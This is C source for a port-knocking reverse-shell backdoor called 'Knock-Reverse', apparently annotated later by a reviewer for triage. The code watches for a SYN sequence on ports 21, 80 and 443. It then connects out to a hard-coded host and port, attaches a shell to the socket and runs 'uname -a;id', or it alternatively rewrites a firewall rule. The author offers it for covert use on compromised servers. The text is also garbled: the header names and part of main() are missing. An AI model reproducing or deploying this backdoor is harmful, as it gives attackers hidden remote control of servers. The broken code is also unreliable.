/*
 * Knock-Reverse backdoor is a backdoor based on cd00r.c phenolite.de
 * - cd00r is a backdoor which uses knocking port technique combined with inetd backdoor
 * - Knock-Reverse combines knocking port technique ,which used by cd00r, with reverse connect backdoor.
 * - Knock-Reverse is very usefull on backdooring server inside of NAT with restricted inbound firewall in gateway
 *
 * [attacker] ------------- [gateway+firewall] ------------- [Server owned inside NAT]
 *
 * For illustration : Inbound firewall in gateway only allows connection to port 20,21,80,443.
 * Backdooring using a binding method needs to compromise gateway servers or modification of
 * running service on port 21,80,443 which will be difficult. We can used opened port to make a
 * reverse connect to attacker server by sending TCP SYN flags.
 * This code has been tested on Linux, OpenBSD, FreeBSD x86.
 * Hiding this daemon is your jobz :P
 * Copyright Ph03n1X of kandangjamur.net /et/ 2007
 */

/*
 * Analyst note (review): this copy is damaged by extraction -- every "<...>" span appears
 * to have been dropped, so the #include lines below carry no header names and the part of
 * main() between "for (i=1;i" and "ihl*4))" is missing. The text is kept exactly as found;
 * nothing has been reconstructed.
 *
 * Behaviour visible in the surviving code (useful for triage and detection):
 *   - matches the destination port of each captured TCP SYN against KNOCKRULE, in order;
 *   - once the whole sequence has been seen, with KASUS==1 it forks a child that connects
 *     out to CIP:PORTCB, dup2()s that socket over fd 0/1/2, prints a fixed banner string,
 *     runs "uname -a;id" through system() and then execl()s /bin/sh;
 *   - with KASUS==2 it instead runs the FWRULE command string through system().
 *   The hard-coded CIP, PORTCB, KNOCKRULE, the banner text and the "uname -a;id" string
 *   are literal indicators present in this source.
 */

/* Header names were lost in extraction (see analyst note above); left as found. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define INTERFACE "eth0"          /* capture interface; presumably used in the lost part of main() */
#define KNOCKRULE {21,80,443}     /* knock sequence: SYN destination ports expected in this order */
#define CIP "172.16.11.234"       /* hard-coded callback host, resolved with gethostbyname() in conback() */
#define PORTCB 54321              /* hard-coded callback TCP port used by conback() */
/* KASUS set to 1 when used for connect-back */
/* KASUS set to 2 when used to change a firewall rule */
#define FWRULE "ipfw add 50 fw 127.0.0.1,22 tcp from any to any 443 in"   /* command passed to system() when KASUS==2 */
#define KASUS 1                   /* selects the action taken after a complete knock sequence */
#define ETHLENGTH 14              /* Ethernet header length; not referenced in the surviving code */
#define IP_MIN_LENGTH 20          /* minimum IPv4 header length; not referenced in the surviving code */
#define CAPLENGTH 98              /* snapshot length; presumably used in the lost pcap setup */

/*
 * Minimal IPv4 header view used to locate the TCP header in a captured packet.
 * NOTE(review): the bit-field order (ihl before version) and the use of plain
 * short/u_short fields are compiler- and byte-order-dependent; the author only
 * claims x86 targets.
 */
struct headerip {
    u_char ihl:4,            /* header length */
           version:4;        /* version */
    u_char tos;              /* type of service */
    short tot_len;           /* total length */
    u_short id;              /* identification */
    short off;               /* fragment offset field */
    u_char ttl;              /* time to live */
    u_char protocol;         /* protocol */
    u_short check;           /* checksum */
    struct in_addr saddr;
    struct in_addr daddr;    /* source and dest address */
};

/*
 * TCP header view. Only dest_port and rawflags are read by the surviving code:
 * rawflags holds the data-offset/flags word and is tested for the SYN bit (0x02).
 * NOTE(review): field widths use long int, whose size is platform-dependent.
 */
struct headertcp {
    unsigned short int src_port;
    unsigned short int dest_port;
    unsigned long int seq_num;
    unsigned long int ack_num;
    unsigned short int rawflags;
    unsigned short int window;
    long int crc_a_urgent;
    long int options_a_padding;
};

unsigned int cports[] = KNOCKRULE;   /* knock sequence, copied from KNOCKRULE */
int cportcnt = 0;                    /* number of ports in the sequence, computed in main() */
int actport = 0;                     /* index of the next port expected in the sequence */

/* Terminates the process immediately; where it is installed is not visible in this copy. */
void signal_handler(int sig) {
    _exit(0);
}

/*
 * malloc() wrapper: exits the process when allocation fails, otherwise returns
 * the block zero-filled. Caller owns the returned memory.
 */
void *smalloc(size_t size) {
    void *p;
    if ((p=malloc(size))==NULL) {
        exit(-1);
    }
    memset(p,0,size);
    return p;
}

/*
 * Connect-back action (KASUS==1). Resolves CIP, forks, and in the child connects
 * to CIP:PORTCB, redirects fd 0/1/2 onto the socket, prints a banner, runs
 * "uname -a;id" via system() and finally execl()s /bin/sh. The parent only
 * closes its copy of the socket. Error paths just print a message (in Indonesian).
 */
void conback() {
    int s,con,child;
    struct hostent *he;
    struct sockaddr_in address;

    if((s=socket(AF_INET,SOCK_STREAM,0))<0){
        printf("Gagal bikin socket untuk reverse connect\n");
    }
    if((he=gethostbyname(CIP))==NULL){
        printf("Gagal resolve IP buat reverse\n");
        close(s);
    }

    bzero((char *) &address, sizeof(address));
    address.sin_family = AF_INET;
    bcopy( (char *)he->h_addr,(char *)&address.sin_addr.s_addr,he->h_length);
    address.sin_port = htons(PORTCB);

    child=fork();
    if(child==0){
        /* child: outbound connection to the hard-coded callback address */
        con=connect(s,(struct sockaddr *)&address,sizeof(address));
        if(con<0){
            printf("Ga bisa connect ke box yang ada netcat listennya\n");
            close(s);
        }
        /* stdio of this process is now the socket */
        dup2(s,2);
        dup2(s,1);
        dup2(s,0);
        printf("Remote reverse backdoor by Ph03n1X || king_purba@yahoo.co.uk\n");
        system("uname -a;id");
        execl("/bin/sh","/bin/sh -i",NULL);
        close(s);
    }
    close(s);
}

/*
 * Entry point. Counts the knock ports, builds a pcap "port X or port Y ..." filter
 * string (only the first port's piece survives in this copy), then loops over captured
 * packets: every SYN whose destination port equals cports[actport] advances the
 * sequence, and on completion the KASUS action runs and actport resets to 0.
 * The pcap open/loop/parse code between "for (i=1;i" and "ihl*4))" was lost in
 * extraction and is left exactly as found.
 */
int main(int argc,char *argv[]) {
    char pcap_err[PCAP_ERRBUF_SIZE];
    pcap_t *cap;
    bpf_u_int32 network,netmask;
    struct pcap_pkthdr *phead;
    struct bpf_program cfilter;
    struct headerip *ip;
    struct headertcp *tcp;
    u_char *pdata;
    char *filter;          /* heap-allocated BPF filter text from smalloc() */
    char portnum[6];       /* scratch for one " %d" port fragment */
    int i;
#define PORTCON "port "
#define ORCON " or "

    /* walk cports until a zero element to find the sequence length */
    while (cports[cportcnt++]);
    cportcnt--;

    if (cports[0]) {
        memset(&portnum,0,6);
        snprintf(portnum,sizeof(portnum)," %d",cports[0]);
        filter=(char *)smalloc(strlen(PORTCON)+strlen(portnum)+1);
        strncpy(filter,PORTCON,sizeof(filter));
        strncat(filter,portnum,sizeof(filter));
    } else {
        printf("NO port code\n");
        exit (0);
    }

    /* --- garbled in this copy: the loop condition, pcap setup and packet parsing up to
       the (ip->ihl*4) offset were dropped by extraction; tokens kept as found --- */
    for (i=1;iihl*4));
    /* 0x02 is the SYN bit of the TCP flags word */
    if((ntohs(tcp->rawflags)&0x02)){
        printf("This is SYN packet\n");
        if (ntohs(tcp->dest_port)==cports[actport]) {
            /* full knock sequence observed: run the configured action and restart */
            if ((++actport)==cportcnt) {
                if(KASUS==1){
                    conback();
                    actport=0;
                }else if(KASUS==2){
                    system(FWRULE);
                    actport=0;
                }else{
                    actport=0;
                    continue;
                }
            }
        }
    }
    }//end of never ending for loop
}